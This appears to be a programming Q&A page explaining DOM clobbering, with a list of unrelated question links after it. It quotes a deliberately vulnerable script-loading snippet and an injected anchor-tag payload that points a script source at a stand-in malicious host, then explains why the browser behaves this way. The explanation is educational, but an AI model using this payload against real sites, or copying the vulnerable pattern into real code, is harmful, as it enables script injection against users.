DOM Clobbering and how it works
I have some questions to the topic of DOM Clobbering:
Portswigger explains it with:
<script>
window.onload = function(){
let someObject = window.someObject || {};
let script = document.createElement('script');
script.src = someObject.url;
document.body.appendChild(script);
};
</script>
To exploit this vulnerable code, you could inject the following HTML to clobber the someObject reference with an anchor element:
<a id=someObject><a id=someObject name=url href=//malicious-website.com/malicious.js>
As the two anchors use the same ID, the DOM groups them together in a DOM collection. The DOM clobbering vector then overwrites the someObject reference with this DOM collection. A name attribute is used on the last anchor element in order to clobber the url property of the someObject object, which points to an external script.
My understanding is:
The anchor elements with id someObject are stored in an array-like structure - a DOM collection.
Via
var someObject = window.someObject || {};
the anchor element is referred using the id - some browsers store ids directly in the window object (Are IDs for an html element always available from the window object?).
However:
- Why does the name attribute override the url property with the URL?
- What has the DOM collection to do with all this?
- Does the object initializer in
window.someObject || {}(https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/Object_initializer) play any role for the attack?
This is what the console says:
(Further information about this topic can also be found here: https://medium.com/@shilpybanerjee/dom-clobbering-its-clobbering-time-f8dd5c8fbc4b)
Why does the name attribute override the url property with the URL?
Because someObject is actually an HTMLCollection and you can access named elements in an HTMLCollection by their name.
console.log( document.getElementsByClassName("test").bar );<div class="test" name="foo"><div><div class="test" name="bar"></div>What has the DOM collection to do with all this?
Notice how they do have two elements with the same id attribute? Well, even though it's against the specs, the same specs actually have a special rule handling this case when accessing named elements as window's properties: specs
- Otherwise, if objects has only one element, return that element.
- Otherwise return an HTMLCollection rooted at window's associated Document, whose filter matches only named objects of window with the name name. (By definition, these will all be elements.)
I think only Chrome does respect the specs here, so in this browser, if you access an element through its id like this and there are multiple elements with the same ìd`, you get an HTMLCollection instead of an Element:
console.log( window.foo ); // in Chrome [HTMLCollection]<div id="foo">1</div><div id="foo">2</div>Does the object initializer in window.someObject || {} (https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/Object_initializer) play any role for the attack?
This is just to avoid having null in case there is no element with this id at the time the handler fires, so it's mainly useless here.
Last question: Why does
script.src = someObject.url;extract the href out of the whole anchor element?
Because HTMLAnchorElement.toString() returns the .href value.
- Ways to extend Array object in javascript
- Building bundle for web in vite
- Is there any way to hide the mapbox access token when initializing the map?
- Playwright - sharing state between tests
- How to create a thumbnail after cropping an image with jQuery Cropper
- Validate kendo upload control
- jQuery button click not showing/hiding content
- What's the difference between self and window?
- Small value in doughnut chart is not visible - Chartjs
- How can a function know whether it has been invoked as a constructor (using the `new` keyword)?
- What are the differences between a function expression (`function (…) { … }`) and invoking the Function constructor (`new Function(…)`)?
- Why is it possible for functions to have properties like objects? Are functions also objects?
- console.log timestamps in Chrome
- How can I count and show Unicode Characters when insert onclick to textarea?
- How to set compilerOptions.isCustomElement for VueJS 3 in Laravel project
- Creating a new Date object or using setter methods of javascript Date()
- PHP request to PHP Websocket
- Type 'void' is not assignable to type '((event: ChangeEvent<HTMLInputElement>) => void) React TypeScript
- Is there some default popup for appstore download on itunes when webapp is viewed in mobile safari?
- Turn off webcam/camera after using getUserMedia
- Show a message if a text is copied successfully(alternative to alert)
- "Uncaught TypeError: Cannot read property 'property' of undefined" when loading style with mapbox
- How to get the first Tamil letter in a word?
- handle both mouse and touch events on touch screens
- Truncate number to two decimal places without rounding
- Tailwindcss in webpack configuration not getting applied
- How to access $children for creating Tabs component?
- How to load a gzip compressed javascript without a webserver?
- What's the yield keyword in JavaScript?
- How to get the value of a selected radio button